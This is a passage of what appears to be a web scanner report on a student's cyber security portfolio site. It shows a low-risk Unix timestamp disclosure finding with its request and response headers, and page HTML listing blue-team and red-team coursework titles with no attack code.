          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          908189033
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        12. GET https://beekmans.dev
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          998027574, which evaluates to: 2001-08-17 07:52:54

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
